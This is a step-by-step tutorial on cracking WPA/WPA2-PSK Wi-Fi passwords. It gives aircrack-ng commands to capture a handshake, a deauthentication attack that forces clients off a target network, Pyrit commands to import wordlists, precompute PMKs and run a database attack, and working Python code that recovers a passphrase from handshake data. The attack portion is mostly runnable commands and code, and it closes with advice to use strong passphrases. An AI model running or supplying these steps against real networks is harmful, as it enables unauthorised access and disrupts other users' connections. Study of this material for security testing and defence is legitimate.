The next type of attack I’ll cover lets you import many dictionaries into a database, pre-compute them against the target’s ESSID, and then attack the handshake with everything you imported. First let’s install a suite called Pyrit, because it is not included in BackTrack.
Installing pyrit
Do the following at the terminal:
svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit_svn
The checkout only downloads the source. To actually install it, change into the pyrit directory of the checkout and build and install it with its setup script (python setup.py build, then python setup.py install as root). After that Pyrit is installed; running pyrit with no arguments should print its usage.
I will be using Pyrit together with aircrack-ng.
First of all, put the wireless card in monitor mode. We use the aircrack-ng suite until we have the handshake.
First use:
#airmon-ng start wlan0
Then use:
#airodump-ng wlan0
Note that with some drivers airmon-ng creates a separate monitor interface (for example mon0) instead of switching wlan0 itself; use whatever interface name airmon-ng reports in all of the commands that follow.
At this point you should see all the information about the network you are going to attack. For this example we attack a WPA-encrypted network with ESSID WLAN, BSSID 00:80:5A:28:B5:AB, operating on channel 11.
Now restrict the capture to this network only and write it to a file, using the following command:
#airodump-ng --bssid 00:80:5A:28:B5:AB -c 11 -w wpahandshake wlan0
This sniffs the packets of WLAN and saves them to files whose names start with wpahandshake.
Remember that it is the *.cap file we will need at the end.
If a client is connected to the network, run a deauthentication attack so the client has to re-authenticate and you capture the handshake; if nobody is connected, wait until someone does.
#aireplay-ng -0 10 -a 00:80:5A:28:B5:AB -c 00:15:AF:A2:8D:98 wlan0
Here -0 10 sends ten deauthentication frames, -a is the BSSID and -c is the MAC address of the connected client. Run it from a second terminal while airodump-ng keeps capturing, and watch the top-right corner of the airodump-ng output for “WPA handshake: 00:80:5A:28:B5:AB”, which tells you the handshake has been captured.
Now that you have the handshake, let’s use Pyrit.
Let’s analyze the handshake file with the following command:
#pyrit -r wpahandshake-01.cap analyze
Note that wpahandshake-01.cap is one of the files airodump-ng saved with the packets sniffed from the “victim’s” network; airodump-ng numbers them (wpahandshake-01.cap, wpahandshake-02.cap, …), so use the name of the capture that actually contains the handshake. The -r parameter tells Pyrit which capture file to read.
Pyrit then prints a summary of the capture.
In our case it reports that the access point with MAC 00:80:5A:28:B5:AB has WLAN as its ESSID, and that the file contains a handshake from the client with MAC address 00:15:AF:A2:8D:98. Pyrit also rates each handshake as good, workable or bad; only a good or workable one is worth attacking.
So now let’s start working with Pyrit’s database.
As you may know, guessing the password used in WPA-PSK and WPA2-PSK is a computationally intensive task. During this process 100% of your CPU is used to compute what is known as the Pairwise Master Key, a 256-bit key derived from the ESSID and the password with the PBKDF2-HMAC-SHA1 algorithm (4096 iterations, with the ESSID as the salt). One of the major weaknesses of WPA-PSK is that the Pairwise Master Key contains no element that is unique to the moment of the key negotiation between Access Point and Station. It is therefore possible to pre-compute the Pairwise Master Key and store it for later use.
This is where Pyrit’s database kicks in. It can store ESSIDs, passwords and their corresponding Pairwise Master Keys, possibly growing to the size of hundreds of millions of entries. Starting with a fresh installation of Pyrit, your database will most probably be empty.
Issue the following command to get an overview:
#pyrit eval
And you will get this output:
root@bt:~# pyrit eval
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Connecting to storage at 'file://'... connected.
Passwords available: 0
Let’s use a command to import some passwords into our database:
#pyrit -i /pentest/passwords/wordlists/wordlist.txt import_passwords
Note that “/pentest/passwords/wordlists/wordlist.txt” is the path where I have stored a wordlist; you can import dozens of dictionary files this way. Pyrit ensures that duplicate passwords are not stored twice, and it also drops entries that cannot be a WPA/WPA2 passphrase (a PSK passphrase must be 8 to 63 characters long).
After you imported the passwords to the database, use this command again:
#pyrit eval
You should get an output like this:
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Connecting to storage at 'file://'... connected.
Passwords available: 989532
Now that we have some passwords in the database, we have to create an ESSID. For that, use the following command:
#pyrit -e WLAN create_essid
Note that WLAN is our “victim’s” ESSID.
Pyrit will report that ESSID WLAN was created successfully, and if you run the “eval” command again it will show that no passwords have been pre-computed for WLAN yet.
So we now have passwords in the database and an ESSID created; what is missing is to pre-compute the Pairwise Master Keys of those passwords for that ESSID. This can take anywhere from minutes to hours, depending on how many passwords you imported and on your hardware.
To pre-compute the passwords against the ESSID you just created, use this command:
#pyrit batch
Pyrit prints “Batchprocessing done” when it finishes; running pyrit eval again now shows how many PMKs are stored for WLAN.
We can now use the Pairwise Master Keys stored in the database to attack the handshake captured above. Instead of running a “passthrough attack” (attack_passthrough), which computes the PMKs on the fly and never touches the database, we issue a “database attack” like the following:
#pyrit -r wpahandshake-01.cap attack_db
Don’t forget that wpahandshake-01.cap is the file where the handshake is stored and that the -r parameter tells Pyrit to read that file. You should then get output like the one in the screenshot: Pyrit tries 515,375 PMKs per second and reports that the password is “security”.
The attack itself is much faster than a plain dictionary attack because the expensive PBKDF2 step was already done by batch; for each candidate only the cheap check against the handshake remains. The time moves into pre-computing the passwords against the ESSID, which pays off whenever you attack more than one handshake with the same ESSID, or re-run the attack after importing further dictionaries, since only passwords that are new to the database have to be computed.
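To make the reasoning above concrete (why the PMK can be pre-computed, and what attack_db still has to do per candidate), here is an added example that is not code from this page or from Pyrit. It models the four Pyrit steps (import_passwords, create_essid, batch, attack_db) on a toy in-memory database and a constructed handshake: the MAC addresses are the ones used on this page, the nonces are random, and the EAPOL-Key frame body is a simplified placeholder, not a real capture. Checking a candidate PMK against a handshake (PRF-512 down to the Key Confirmation Key, then an HMAC over the EAPOL frame) is the standard 802.11i procedure every handshake cracker uses; the page does not describe it, and its details here are my own. The import filter of 8 to 63 ASCII characters is the WPA passphrase rule, not a reproduction of Pyrit’s exact filter.

```python
import hashlib
import hmac
import os


def pmk(essid, passphrase):
    # PBKDF2-HMAC-SHA1, ESSID as salt, 4096 iterations, 256-bit output.
    # Nothing from the handshake enters here, so it can be computed once and stored.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def prf512(key, label, data):
    # 802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i), i = 0..3, cut to 64 bytes
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def kck_from_pmk(pmk_bytes, ap_mac, sta_mac, anonce, snonce):
    # Key Confirmation Key = first 16 bytes of the PTK. The per-session nonces
    # enter here, so this part cannot be precomputed.
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk_bytes, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck, eapol, key_version):
    # MIC over the EAPOL-Key frame with its MIC field zeroed: HMAC-MD5 for WPA
    # (descriptor version 1), HMAC-SHA1 truncated to 16 bytes for WPA2 (version 2).
    if key_version == 2:
        return hmac.new(kck, eapol, hashlib.sha1).digest()[:16]
    return hmac.new(kck, eapol, hashlib.md5).digest()


class PmkDatabase:
    """In-memory stand-in for Pyrit's storage: a password set plus, per ESSID, password -> PMK."""

    def __init__(self):
        self.passwords = set()
        self.essids = {}

    def import_passwords(self, words):
        # Like `pyrit -i wordlist import_passwords`: duplicates are dropped, and so
        # is anything that cannot be a WPA passphrase (8..63 ASCII characters).
        before = len(self.passwords)
        for word in words:
            word = word.rstrip("\r\n")
            if 8 <= len(word) <= 63 and word.isascii():
                self.passwords.add(word)
        return len(self.passwords) - before

    def create_essid(self, essid):
        # Like `pyrit -e ESSID create_essid`.
        self.essids.setdefault(essid, {})

    def batch(self):
        # Like `pyrit batch`: compute the PMK for every (ESSID, password) pair
        # still missing. This is the slow step: 2 x 4096 HMAC-SHA1 per pair.
        done = 0
        for essid, table in self.essids.items():
            for word in self.passwords.difference(table):
                table[word] = pmk(essid, word)
                done += 1
        return done


def attack_db(db, hs):
    # Like `pyrit -r capture.cap attack_db`: for every stored PMK of the handshake's
    # ESSID derive the KCK and check the MIC. About 5 HMACs per candidate instead
    # of 8192, which is where the speed-up over a plain dictionary attack comes from.
    for word, pmk_bytes in db.essids.get(hs["essid"], {}).items():
        kck = kck_from_pmk(pmk_bytes, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"], hs["key_version"]), hs["mic"]):
            return word
    return None


def make_handshake(essid, passphrase, key_version=2):
    # Constructed handshake, not a capture: the MACs are the page's, the nonces are
    # random and the EAPOL-Key body is a simplified placeholder with the MIC zeroed,
    # i.e. what a cracker holds after parsing airodump-ng's .cap file.
    ap_mac = bytes.fromhex("00805A28B5AB")
    sta_mac = bytes.fromhex("0015AFA28D98")
    anonce, snonce = os.urandom(32), os.urandom(32)
    eapol = b"\x01\x03\x00\x5f\x02\x01\x0a\x00" + bytes(16) + snonce + bytes(50)
    kck = kck_from_pmk(pmk(essid, passphrase), ap_mac, sta_mac, anonce, snonce)
    return {"essid": essid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "key_version": key_version,
            "mic": eapol_mic(kck, eapol, key_version)}


if __name__ == "__main__":
    # Constructed wordlist: "short" and the 64-char string are rejected and the
    # duplicate is dropped, so only two candidates reach the database.
    db = PmkDatabase()
    print("imported:", db.import_passwords(["short", "security", "security", "Passw0rd!", "x" * 64]))
    db.create_essid("WLAN")
    print("batch computed:", db.batch())
    print("password:", attack_db(db, make_handshake("WLAN", "security")))
    # A second handshake of the same ESSID (fresh nonces) needs no new batch run.
    print("batch computed:", db.batch(), "password:", attack_db(db, make_handshake("WLAN", "security")))
```

The second call to batch() returns 0 and the new handshake is still recovered: that is the whole point of the database. Each candidate costs attack_db a PRF-512 and one HMAC, while batch paid 8192 HMAC-SHA1 per candidate, which is the same ratio that lets Pyrit report hundreds of thousands of PMKs per second during attack_db. The PMK function can be checked against the published IEEE 802.11i test vector (passphrase “password”, SSID “IEEE”).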
Alright, I’ve been telling you to use WPA, and still it got cracked. However, this attack only succeeds if the passphrase is in the dictionaries you imported, and it would take ages to crack a good PSK even with a huge dictionary. So always use a strong, long passphrase.